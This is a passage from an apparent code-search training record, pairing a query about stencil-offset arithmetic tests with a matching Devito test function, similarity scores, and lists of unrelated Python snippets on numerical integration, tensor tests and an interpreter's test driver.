alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def calculation(numbers, indexes):\n ops = [ops_tuple[x] for x in indexes]\n repr_ops_and_nums = tuple(repr_ops_tuple[x] for x in indexes) + numbers\n try:\n if ops[0](numbers[0], ops[1](numbers[1], ops[2](numbers[2], \\\n numbers[3]))) == 24:\n return '({0} {3} ({1} {4} ({2} {5} {6})))'.format(*repr_ops_and_nums)\n if ops[0](ops[1](numbers[0], numbers[1]), \\\n ops[2](numbers[2], numbers[3])) == 24:\n return '({0} ({1} {3} {4}) ({2} {5} {6}))'.format(*repr_ops_and_nums)\n except ZeroDivisionError:\n pass # omit zero division error", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def resta(x, y):\n return x - y", "def main():\n argc = len(sys.argv)\n if argc > 1:\n first_arg = sys.argv[1]\n if first_arg == '--test':\n env = environment.Environment()\n execution.execute_statement('x = 3', env)\n execution.execute_statement('x+=7', env)\n execution.execute_statement('y=9.23', env)\n env.new_frame()\n execution.execute_statement('x = 5', env)\n print(env.frames)\n execution.execute_statement('z=\"hello world\"', env)\n execution.execute_statement('z +=\"!!!\"', env)\n execution.execute_statement('a= `gelatin`', env)\n print(env.frames)\n ast = ast2.AST(\"3*4+5 ^ 7\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n ast = ast2.AST(\"18+15*9:3+10\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n\n print(execution.evaluate_expression('1+2+3+4', environment.Environment()))\n print(execution.evaluate_expression('45+7*8', environment.Environment()))\n print(execution.evaluate_expression('3.2+18^2-7', environment.Environment()))\n print(execution.evaluate_expression('1:2 + 1:3 + 1:5', environment.Environment()))\n print(execution.evaluate_expression('2:3 + 3^3 - 1:5', environment.Environment()))\n print(execution.evaluate_expression('1234', environment.Environment()))\n \n ast = ast2.AST(\"3 + 1 == 4\")\n print(ast.parse())\n ast = ast2.AST(\"3 + 1 > 4\")\n print(ast.parse())\n ast = ast2.AST(\"18:1 != 18.2\")\n print(ast.parse())\n ast = ast2.AST(\"x = 4\")\n print(ast.parse())\n ast = ast2.AST(\"y = 3 > 4\")\n print(ast.parse())\n \n env2 = environment.Environment()\n execution.execute_statement('x = 3+5*4', env2)\n execution.execute_statement('y = x + 19 - 3*6', env2)\n print(env2.frames)\n elif first_arg == '--test2':\n ast = ast2.AST('x = \"ice cream, eggs, and milk\" + \"...alpha or beta\"')\n print(ast.parse())\n ast = ast2.AST('y = f(1 + 1, 2 + 2, 3 + 3) - g((9+7)*2, 128/(2+2))')\n print(ast.parse())\n ast = ast2.AST('z = f(\"ice cream\", \"eggs and milk\") * g(\"alpha or beta\", 3:8, \"gamma or delta\")')\n print(ast.parse())\n ast = ast2.AST('makeList(1,2,3) + makeList(4,5,6)')\n print(ast.parse())\n ast = ast2.AST('[max(16, 25), max(36, max(49, 64))]')\n print(ast.parse())\n ast = ast2.AST('[concat_lists([10], [20]), concat_lists([30], [40])]')\n print(ast.parse())\n elif first_arg == '--test3':\n ast = ast2.AST('[1, 2, 3]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2), f(3), f(4)]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2, 3), f(3, 4, 5), f(4, 1)]')\n print(ast.split_list_elems())\n ast = ast2.AST('1 + 2 * 3')\n print(ast.split_list_elems())\n print(ast.parse())\n elif first_arg == '--test4':\n ast = ast2.AST('x.length()')\n print(ast.parse())\n ast = ast2.AST('[1,2,3].length()')\n print(ast.parse())\n ast = ast2.AST('3.01')\n print(ast.parse())\n ast = ast2.AST('3.1')\n print(ast.parse())\n elif first_arg == '--test5':\n env = environment.Environment()\n env.new_type(['Number'], 'ComplexNumber')\n c = {'$type': 'ComplexNumber', 'real': 1, 'imag': 2}\n print(env.value_is_a(c, 'ComplexNumber'))\n print(env.value_is_a(c, 'Number'))\n print(env.value_is_a(c, 'Int'))\n print(\"\")\n env.new_type(['Object'], 'Food')\n env.new_type(['Food'], 'Pizza')\n env.new_type(['Food'], 'Dessert')\n env.new_type(['Dessert'], 'ChocolateItem')\n env.new_type(['Pizza'], 'PepperoniPizza')\n env.new_type(['Pizza', 'ChocolateItem'], 'ChocolatePizza')\n pepperoni_pizza = {'$type': 'PepperoniPizza'}\n chocolate_pizza = {'$type': 'ChocolatePizza'}\n print(env.value_is_a(pepperoni_pizza, 'PepperoniPizza'))\n print(env.value_is_a(pepperoni_pizza, 'Pizza'))\n print(env.value_is_a(pepperoni_pizza, 'Food'))\n print(env.value_is_a(pepperoni_pizza, 'Dessert'))\n print(env.value_is_a(pepperoni_pizza, 'ChocolateItem'))\n print(\"\")\n print(env.value_is_a(chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(chocolate_pizza, 'Pizza'))\n print(env.value_is_a(chocolate_pizza, 'Food'))\n print(env.value_is_a(chocolate_pizza, 'Dessert'))\n print(env.value_is_a(chocolate_pizza, 'ChocolateItem'))\n print(\"\")\n env.new_type(['ChocolatePizza'], 'HugeChocolatePizza')\n huge_chocolate_pizza = {'$type': 'HugeChocolatePizza'}\n print(env.value_is_a(huge_chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Pizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Food'))\n print(env.value_is_a(huge_chocolate_pizza, 'Dessert'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolateItem'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolatePizza'))\n print(\"\")\n elif first_arg == '--test6':\n ast = ast2.AST('{1, 2 | 3, 4}')\n print(ast.parse())\n elif first_arg == '--test7':\n ast = ast2.AST('throw \"something\"')\n print(ast.parse())\n elif first_arg == '--test8':\n ast = ast2.AST('true and not false')\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n elif first_arg == '--test9':\n sample = \"\"\"\n x = 5 // comment\n // comment\n /* multi\n line\n comment\n */y = 6\n z = \"https://example.com\"\n \"\"\"\n print(prepare_program.preprocess(sample))\n elif first_arg == '--test10':\n ast = ast2.AST('-3.0e5 + 186e-20 * 1e-6 / 28.8e+6 + 34.4e+99')\n print(ast.parse())\n ast = ast2.AST('-3.0E5 + 186E-20 * 1E-6 / 28.8e+6 + 34.4E+99')\n print(ast.parse())\n elif first_arg == '--test11':\n print(execution.is_assignment_statement('a = 5'))\n print(execution.is_assignment_statement('a=5==6'))\n print(execution.is_assignment_statement('not (5==6) and (8>=7)'))\n print(execution.is_assignment_statement('z='))\n elif first_arg == '--test12':\n lines = [\n 'sub this + that',\n 'func Int x + this',\n 'func x + this',\n 'func this * y',\n 'func Int -this',\n 'sub -this',\n 'sub not this',\n 'sub Boolean not this',\n 'sub this-b',\n 'sub b-this',\n 'func Int-this',\n 'func Int- this',\n 'sub Int - this'\n ]\n print(prepare_program.replace_op_overload_syntax(lines))\n elif first_arg == '--test-tree-merge':\n tests.test_tree_merge()\n elif first_arg == '--test-all':\n tests.test_all('capacita_programs')\n elif first_arg == '--test-all-fast':\n tests.test_all('capacita_programs', has_delay=False)\n elif first_arg == '--test-repl':\n tests.test_all('capacita_programs', has_delay=True, use_repl=True)\n elif first_arg == '--test-repl-fast':\n tests.test_all('capacita_programs', has_delay=False, use_repl=True)\n elif first_arg == '--test-file' and argc > 2:\n if argc == 4 and sys.argv[2] == '--repl':\n tests.test_file(sys.argv[3], use_repl=True)\n else:\n tests.test_file(sys.argv[2], use_repl=False)\n else:\n # Run a program from a text file:\n file_name = first_arg\n execute_file(file_name)\n exit()\n repl()" ]
[ "0.54499704", "0.54236096", "0.54200417", "0.54183537", "0.53868484", "0.5386813", "0.5386671", "0.53676295", "0.53601813", "0.5349417", "0.53437924", "0.53436583", "0.5304866", "0.53009784", "0.5292884", "0.52877325", "0.5283028", "0.5282718", "0.5279577", "0.52767044", "0.5276021", "0.5260619", "0.5257482", "0.52488494", "0.52344966", "0.52331054", "0.5233018", "0.5230695", "0.52179277", "0.5217522", "0.52054197", "0.5195868", "0.5189734", "0.51829654", "0.5181476", "0.5177961", "0.517586", "0.5174988", "0.5174578", "0.51669264", "0.51631236", "0.5151324", "0.5147226", "0.51358706", "0.513306", "0.51312584", "0.5129804", "0.51283187", "0.51192945", "0.51058984", "0.5096199", "0.5088895", "0.5087355", "0.5071146", "0.5070005", "0.50689626", "0.5064859", "0.5054195", "0.505373", "0.5053145", "0.50525963", "0.50501037", "0.50262296", "0.50257456", "0.502241", "0.502136", "0.5011525", "0.5004945", "0.5003532", "0.50032806", "0.49986234", "0.4993963", "0.49928966", "0.4987319", "0.4986297", "0.49788633", "0.49728307", "0.49683145", "0.49595952", "0.49521044", "0.4937498", "0.49374878", "0.49335614", "0.49298248", "0.49178353", "0.49149936", "0.49027124", "0.4901953", "0.48967844", "0.48941246", "0.48922443", "0.48898706", "0.48898706", "0.48898706", "0.4885512", "0.48848727", "0.48802847", "0.48792848", "0.4869185", "0.48678133" ]
0.70558316
0
Test pointwise arithmetic with stencil offsets across a single functions with buffering dimension in indexed expression format
def test_indexed_buffered(self, expr, result): i, j, l = dimify('i j l') a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base fa = a.function eqn = eval(expr) Operator(eqn)(fa) assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_indexed_open_loops(self, expr, result):\n i, j, l = dimify('i j l')\n pushed = [d.size for d in [j, l]]\n j.size = None\n l.size = None\n a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed\n fa = a.function\n fa.data[0, :, :] = 2.\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)\n j.size, l.size = pushed", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def position_op(x, wfunc):\n return x*wfunc", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_elemwise2():\r\n rng = numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def test_1d_2d(self):\n \n self.assertEqual(len(self.storage), 